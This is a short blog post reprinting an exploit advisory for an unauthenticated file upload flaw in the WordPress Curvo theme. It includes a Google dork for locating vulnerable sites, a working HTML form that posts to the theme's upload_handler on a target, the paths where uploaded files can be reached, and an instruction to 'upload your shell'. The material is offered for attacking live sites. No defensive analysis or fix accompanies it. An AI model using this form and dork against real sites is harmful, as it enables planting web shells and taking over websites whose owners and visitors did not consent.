Thursday, 7 November 2013

WordPress Curvo Themes CSRF File Upload Vulnerability

# Exploit Title: WordPress Curvo Themes CSRF File Upload Vulnerability
# Author: Byakuya
# Date: 10/26/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://www.wphub.com/themes/curvo-by-themeforest/
# Price: $35
# Affected Version: Unknown
# Infected File: upload_handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/curvo/
###################################################################################################

# Exploit & POC : ( Save in XAMPP doc. ex.php and Run It ) After that upload your shell with tamper data .!
Attention !

<form enctype="multipart/form-data"
action="http://target/wordpress/wp-content/themes/curvo/functions/upload-handler.php" method="post">
<input type="jpg" name="url" value="./" /><br />
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

#File access path:
http://target/wordpress/wp-content/uploads/[FILE]
or
http://target/wordpress/wp-content/uploads/[year]/[month]/[FILE] <-- your file uploaded

Labels:

0 Comments:

Post a Comment

Subscribe to Post Comments [Atom]

<< Home